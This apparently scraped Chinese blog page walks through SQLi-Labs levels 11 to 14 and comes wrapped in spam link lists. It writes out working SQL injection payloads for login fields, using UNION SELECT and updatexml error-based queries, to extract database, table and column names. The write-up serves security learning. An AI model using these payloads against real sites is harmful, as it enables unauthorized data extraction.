当前位置: 首页 > news >正文

个人网站做镜像阿里指数在哪里看

news 2025/7/12 1:12:08
个人网站做镜像,阿里指数在哪里看,大数据时代的智能营销,诏安网站建设SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less 11 SQLI DUMB SERIES-11判断注入点 尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单…
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
login attempt
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名:

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

获取用户名

Less 12

SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")
security
同样通过这一个点获取数据库名和用户名。

uname=0") union select database(),user() from dual -- &passwd=1

在这里插入图片描述

Less 13

SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

uname=0'&passwd=1

在这里插入图片描述
正常输入结果显示成功,不过没有任何提示内容。

uname=admin') -- &passwd=1

admin
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

localhost

实施注入

uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

welcome login attempt
获取当前数据库所有的表名

uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

failed
获取user表所有的列名

uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

123
到此注入成功

Less 14

SQLI DUMB SERIES-14

在这里插入图片描述

判断注入点

测试双引号报错。

uname=admin "&passwd=1

在这里插入图片描述
然后经测试采用双引号加注释符就可以验证登录成功。

uname=admin "-- &passwd=1

admin
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml方法即可成功注入

uname=admin " and updatexml(1,user(),3)-- &passwd=1

在这里插入图片描述

实施注入

获取数据库名

uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

在这里插入图片描述

获取当前数据库所有的表名

uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

在这里插入图片描述
获取user表所有的列名

uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

在这里插入图片描述

系列文章

  • sqli-labs 靶场闯关基础准备
  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
  • sqli-labs 靶场 less-7
  • sqli-labs 靶场 less-8、9、10
http://www.khdw.cn/news/28070.html

相关文章:

  • lamp和lnmp wordpress百度关键词优化技巧
  • 关于网站建设新闻国内新闻最新
  • 香港空间做电影网站怎么样百度推广的渠道有哪些
  • 网站建设4435只需要手机号的广告
  • 如何在网站中做公示信息苹果cms播放器
  • 自己做网站创业关键词怎么找出来
  • 岳阳找工作网站深圳百度快照优化
  • 小红门网站建设惠州seo招聘
  • 增加网站关键词库关键词排名怎么上首页
  • 网站优化怎么做分录网络推广策划案
  • 用 asp net 做 的网站app拉新推广赚佣金
  • 做网站分什么软件宁波seo的公司联系方式
  • 网站卖东西怎么做的代运营
  • 上海这边敲墙拆旧做啥网站的比较多写一篇软文多少钱
  • 上海网站建设服方象科技专注于什么领域
  • 西安建设厅网站首页海南快速seo排名优化
  • 前几年做那些网站能致富百度精简版网页入口
  • 厚街镇做网站新网站如何快速收录
  • 做毕设的网站苏州网站优化公司
  • 做网站注意什么问题百度入口官网
  • 满屏网站做多大尺寸seo优化工具软件
  • 保定网站制作计划广告推广图片
  • 文化传播网站建设指数型基金
  • 加强网站建设和维护工作伊春seo
  • 北京市住房和城乡建设委员会官方网站的怎样在浏览器上找网站
  • 网站建设蓝图ppt微商怎么引流被别人加
  • 做订阅号要建立网站吗搜狗搜索引擎入口
  • 建瓯企业网站建设台州百度推广优化
  • 石家庄城市建设档案馆网站优化seo培训班
  • php网站开发 知乎站长工具网站推广